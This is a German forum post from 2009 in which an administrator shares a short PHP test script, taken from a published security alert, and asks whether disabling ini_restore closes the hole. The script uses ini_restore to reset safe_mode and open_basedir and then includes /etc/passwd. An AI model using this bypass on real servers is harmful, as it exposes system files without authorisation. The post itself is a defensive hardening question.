WCM Forum - Einzelnen Beitrag anzeigen

CM²S · 29.10.2009, 17:24

hello ,

es gibt da jetzt einige php issues

test.php
<?

echo ini_get("safe_mode");

echo ini_get("open_basedir");

include("/etc/passwd");

ini_restore("safe_mode");

ini_restore("open_basedir");

echo ini_get("safe_mode");

echo ini_get("open_basedir");

include("/etc/passwd");

?>

zeigt mir nur den Inhalt der der openbase_dir Variable, sonst aber zum glück nix , da ich mit PHP nicht viel zu tun habe , meine Frage: ist das dann mit dem

disable_functions = ini_restore erledigt ??

geht um diesen exploit
http://securityreason.com/achievement_securityalert/42

ciao
CM²S

29.10.2009, 17:24	#1
CM²S Elite Registriert seit: 27.03.2000 Ort: Wien Alter: 55 Beiträge: 1.168	php.ini hello , es gibt da jetzt einige php issues test.php <? echo ini_get("safe_mode"); echo ini_get("open_basedir"); include("/etc/passwd"); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo ini_get("open_basedir"); include("/etc/passwd"); ?> zeigt mir nur den Inhalt der der openbase_dir Variable, sonst aber zum glück nix , da ich mit PHP nicht viel zu tun habe , meine Frage: ist das dann mit dem disable_functions = ini_restore erledigt ?? geht um diesen exploit http://securityreason.com/achievement_securityalert/42 ciao CM²S ____________________________________ \"wann amoi de blaun denen grean an rodn dewich ausroin, daunn siach i schwoaz\" Gedicht aus \"Eigfleischte Wegetaria und aundare meakwürdikeiten, Andreas Nastl http://lichtschwarz.tv